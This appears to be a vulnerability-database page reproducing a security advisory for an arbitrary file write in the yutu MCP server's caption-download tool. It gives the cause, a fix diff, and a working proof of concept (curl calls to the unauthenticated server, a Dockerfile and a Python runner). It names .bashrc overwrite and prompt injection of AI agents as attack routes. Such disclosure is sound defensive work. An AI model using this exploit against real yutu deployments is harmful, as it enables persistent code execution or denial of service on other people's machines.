yutu CVE-2026-50158
HIGHSeverity by source
AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
MCP endpoint is local and unauthenticated by default (AV:L, PR:N, UI:N); arbitrary overwrite gives high integrity and availability impact but no read, so C:N; scope unchanged as writes stay within the process's OS rights.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
Lifecycle Timeline
3DescriptionGitHub Advisory
Arbitrary File Write via MCP caption-download Tool
Summary
The caption-download MCP tool in yutu passes the caller-supplied file parameter directly to os.Create() at pkg/caption/caption.go:272 without any path validation, canonicalization, or confinement to the pkg.Root boundary (YUTU_ROOT). A local attacker - or any process able to reach the HTTP MCP server - can write arbitrary content to any path writable by the yutu process, entirely outside the intended working directory. This is a High severity vulnerability (CVSS 7.7) with high integrity and availability impact.
Details
yutu uses pkg.Root (backed by Go 1.24's os.OpenRoot) to restrict all file I/O to the YUTU_ROOT directory. Every other caption file-write path honours this boundary:
| Method | Sink | Confined? |
|---|---|---|
Caption.Insert() | pkg.Root.Open(c.File) (caption.go:109) | Yes |
Caption.Update() | pkg.Root.Open(c.File) (caption.go:193) | Yes |
Caption.Download() | os.Create(c.File) (caption.go:272) | No |
Caption.Download() is the sole outlier. The attacker-controlled file field flows without restriction from the MCP tool input schema to a raw os.Create() call:
- Source -
cmd/caption/download.go:32-41:downloadInSchemadeclaresfileas a requiredstringfield in the MCP JSON input schema. - Binding -
cmd/caption/download.go:61-64:cobramcp.GenToolHandlermaps MCP input toinput.Download(writer). - Sink -
pkg/caption/caption.go:272:os.Create(c.File)creates or truncates the file at the attacker-supplied path. - Write -
pkg/caption/caption.go:280:file.Write(body)writes the downloaded caption bytes to that path.
// cmd/caption/download.go
var downloadInSchema = &jsonschema.Schema{
Required: []string{"ids", "file"}, // line 34
// ...
"file": {Type: "string", Description: fileUsage}, // line 40
}
// cobramcp.GenToolHandler binds MCP → handler (line 61-64)
cobramcp.GenToolHandler(downloadTool, func(input caption.Caption, writer io.Writer) error {
return input.Download(writer)
})
// pkg/caption/caption.go
body, err := io.ReadAll(res.Body) // line 267
file, err := os.Create(c.File) // line 272 ← unconfined sink
// ...
_, err = file.Write(body) // line 280The caption-download tool is registered by default in init() at cmd/caption/download.go:52, and the HTTP MCP server starts with --auth defaulting to false (cmd/mcp.go:42), meaning no authentication is required for local HTTP callers.
Recommended fix:
--- a/pkg/caption/caption.go
+++ b/pkg/caption/caption.go
@@
- file, err := os.Create(c.File)
+ file, err := pkg.Root.OpenFile(c.File, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600)
if err != nil {
return errors.Join(errDownloadCaption, err)
}PoC
Prerequisites:
- yutu
0.0.0-dev/ commit351c99d - Valid
YUTU_CREDENTIALandYUTU_CACHE_TOKENavailable - yutu MCP server running in HTTP mode
Docker-based reproduction (no live credentials needed):
The self-contained PoC builds a binary that exercises caption.Download() directly inside a container, with YUTU_ROOT=/tmp/yutu_safe_root as the confinement boundary.
# From the report workspace root:
docker build --no-cache -t yutu-vuln001-poc \
-f vuln-001/Dockerfile \
reports/mcp_49_eat-pray-ai__yutu
docker run --rm yutu-vuln001-pocExpected output confirms:
pkg.Root.Open("/tmp/poc-arbitrary-write.txt")is correctly rejected withpath escapes from parent(control).caption.Download()withfile="/tmp/poc-arbitrary-write.txt"succeeds and creates a 79-byte file outsideYUTU_ROOT(exploit).
Live MCP server reproduction:
# Start the HTTP MCP server (no auth by default)
yutu mcp --mode http --port 8216
# Initialise session
curl -sD /tmp/yutu.headers \
-H 'Content-Type: application/json' \
-H 'Accept: application/json, text/event-stream' \
http://localhost:8216/mcp \
-d '{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2025-06-18","capabilities":{},"clientInfo":{"name":"poc","version":"1"}}}' \
>/tmp/yutu.init
SID=$(awk 'tolower($1)=="mcp-session-id:"{print $2}' /tmp/yutu.headers | tr -d '\r')
# Exploit: write caption to arbitrary path
# Replace CAPTION_ID with a caption id accessible by the configured token
curl -s \
-H 'Content-Type: application/json' \
-H 'Accept: application/json, text/event-stream' \
${SID:+-H "Mcp-Session-Id: $SID"} \
http://localhost:8216/mcp \
-d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"caption-download","arguments":{"ids":["CAPTION_ID"],"file":"/tmp/yutu-cve-poc.srt","tfmt":"srt"}}}'
# Verify file was written outside YUTU_ROOT
test -s /tmp/yutu-cve-poc.srt && ls -l /tmp/yutu-cve-poc.srtImpact
This is an Arbitrary File Write vulnerability. Any principal that can invoke the caption-download MCP tool - including an unauthenticated local process when the HTTP MCP server is running with default settings (--auth false) - can write attacker-controlled bytes to any file path accessible to the yutu process. This bypasses the YUTU_ROOT confinement boundary that all other file-write operations in yutu respect.
Potential consequences include:
- Overwriting application binaries, configuration files, or shell startup scripts to achieve persistent code execution.
- Corrupting log files or database files to cause denial of service.
- Writing web-accessible files in deployments where yutu runs alongside a web server.
- Exploitable via prompt injection into an AI agent that uses the yutu MCP server, since the
fileparameter is fully attacker-controlled with no guardrails.
Impacted parties: operators running yutu as an MCP server (HTTP mode, default configuration), AI agent pipelines that expose caption-download to untrusted input, and any user whose machine hosts a yutu process that a local attacker can reach.
Reproduction artifacts
Dockerfile
# VULN-001 PoC Dockerfile
# Build con: reports/mcp_49_eat-pray-ai__yutu/
# repo/ - the cloned yutu repository
# vuln-001/ - this workspace (Dockerfile, poc_main.go)
FROM golang:1.26 AS builder
WORKDIR /build
# Copy the yutu source tree (provides the vulnerable packages)
COPY repo/ .
# Inject PoC as a new command package (does not modify existing source)
RUN mkdir -p cmd/poc_exploit
COPY vuln-001/poc_main.go cmd/poc_exploit/main.go
# Build the PoC binary (static, no CGO needed)
RUN CGO_ENABLED=0 go build -o /poc ./cmd/poc_exploit/
# ── Runtime stage ──────────────────────────────────────────────────────────
FROM debian:12-slim
COPY --from=builder /poc /poc
# YUTU_ROOT defines the pkg.Root confinement boundary.
# The PoC writes to /tmp/poc-arbitrary-write.txt which is OUTSIDE this root,
# demonstrating the os.Create bypass.
ENV YUTU_ROOT=/tmp/yutu_safe_root
RUN mkdir -p /tmp/yutu_safe_root
CMD ["/poc"]poc.py
#!/usr/bin/env python3
"""
VULN-001 PoC Runner
Exploit: Arbitrary File Write via MCP caption-download (CWE-73)
Target : pkg/caption/caption.go:272 -- os.Create(c.File) without pkg.Root confinement
Usage: python3 poc.py
"""
import os
import subprocess
import sys
VULN_DIR = os.path.dirname(os.path.abspath(__file__))
CONTEXT_DIR = os.path.dirname(VULN_DIR)
# mcp_49_eat-pray-ai__yutu/
DOCKERFILE = os.path.join(VULN_DIR, "Dockerfile")
IMAGE_NAME = "yutu-vuln001-poc"
def run(cmd, check=False, **kwargs):
print("$ " + " ".join(str(a) for a in cmd))
result = subprocess.run(cmd, =True, **kwargs)
return result
def main():
print("=" * 70)
print("VULN-001: Arbitrary File Write via MCP caption-download")
print("CWE-73 | pkg/caption/caption.go:272 | os.Create(c.File)")
print("=" * 70)
# ── Build ────────────────────────────────────────────────────────────────
build_cmd = [
"docker", "build",
"--no-cache",
"-t", IMAGE_NAME,
"-f", DOCKERFILE,
CONTEXT_DIR,
]
print("\n[Step 1] Building Docker image ...")
result = run(build_cmd, capture_output=False)
if result.returncode != 0:
print("\n[FAIL] Docker build failed.", file=sys.stderr)
sys.exit(1)
# ── Run ──────────────────────────────────────────────────────────────────
run_cmd = ["docker", "run", "--rm", IMAGE_NAME]
print("\n[Step 2] Running PoC container ...")
result = run(run_cmd, capture_output=True)
stdout = result.stdout or ""
stderr = result.stderr or ""
print(stdout, end="")
if stderr:
print(stderr, end="", file=sys.stderr)
# ── Verdict ──────────────────────────────────────────────────────────────
passed = (
result.returncode == 0
and "VULNERABILITY CONFIRMED" in stdout
and "PASS" in stdout
and "os.Create bypasses pkg.Root" in stdout
)
if passed:
print("\n[RESULT] PASS - vulnerability dynamically reproduced.")
else:
print(f"\n[RESULT] FAIL - container exit code {result.returncode}.", file=sys.stderr)
sys.exit(1)
if __name__ == "__main__":
main()Articles & Coverage 1
AnalysisAI
Arbitrary file write in yutu, a Go-based YouTube CLI and MCP server, lets any caller of the built-in caption-download MCP tool place attacker-controlled bytes at any filesystem path the yutu process can write to. The vulnerable Caption.Download() calls os.Create() on the caller-supplied file parameter, bypassing the YUTU_ROOT (pkg.Root/os.OpenRoot) confinement that every other caption write path enforces. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the yutu MCP server to be running in HTTP mode (yutu mcp --mode http) with the default --auth=false so no attacker authentication is needed, and the server must have valid YUTU_CREDENTIAL and YUTU_CACHE_TOKEN configured plus a reachable caption id, because the write is fed by bytes that Caption.Download() first fetches from YouTube. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The provided CVSS 3.1 vector (AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H, 7.7 High) is internally consistent with the finding: local attack surface, no attacker authentication because the HTTP MCP server defaults to --auth=false, and high integrity/availability impact from arbitrary overwrite with no confidentiality read. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An operator runs `yutu mcp --mode http` on a workstation with valid YouTube credentials configured and the default --auth=false. A local process (or an AI agent tricked via prompt injection) sends a tools/call for caption-download with file set to "/home/user/.bashrc" or a path under a web root; yutu downloads caption bytes and writes them over that file, enabling persistent code execution or denial of service. … |
| Remediation | Vendor-released patch: upgrade to yutu 0.10.9-dev1 or later, which replaces the unconfined os.Create with pkg.Root.OpenFile so the download path honours the YUTU_ROOT boundary (fix commit https://github.com/eat-pray-ai/yutu/commit/87026c4eee1ed28775383807087343a750707bf3, release https://github.com/eat-pray-ai/yutu/releases/tag/v0.10.9-dev1, advisory https://github.com/eat-pray-ai/yutu/security/advisories/GHSA-2c7f-fxww-6w6c). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Immediately inventory all systems running yutu and disable or restrict access to the caption-download MCP tool if operationally feasible. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-73 – External Control of File Name or Path
View allSame technique Denial Of Service
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-2c7f-fxww-6w6c